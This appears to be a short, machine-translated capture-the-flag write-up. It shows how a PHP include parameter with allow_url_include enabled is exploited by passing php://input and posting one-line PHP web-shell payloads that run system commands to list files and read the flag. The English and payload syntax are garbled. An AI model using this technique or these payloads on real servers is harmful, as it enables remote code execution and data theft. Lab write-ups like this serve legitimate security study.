Open the topic , I found that it prompted us to have a phpinfo.php , so we have direct access , no special findings, according to prompt the subject the include , find allow_url_include of information
( Ctrl + f directly into Web Search )
Discovery is open. That allows php: // input form , it is used herein, post data transmission
Construction url :
http://169c1b893df145ceab40a9f940fab6573f46d3b3eb8d426a.changame.ichunqiu.com/?path=php://input
Use post passed sentence Trojan: <PHP echo System ( 'LS');??>
Run it broke many files
Then use bp capture, modify the following sentence Trojan value <php system ( "cat dle345aae.php" );??> Reinjecting repeater in Go once obtained flag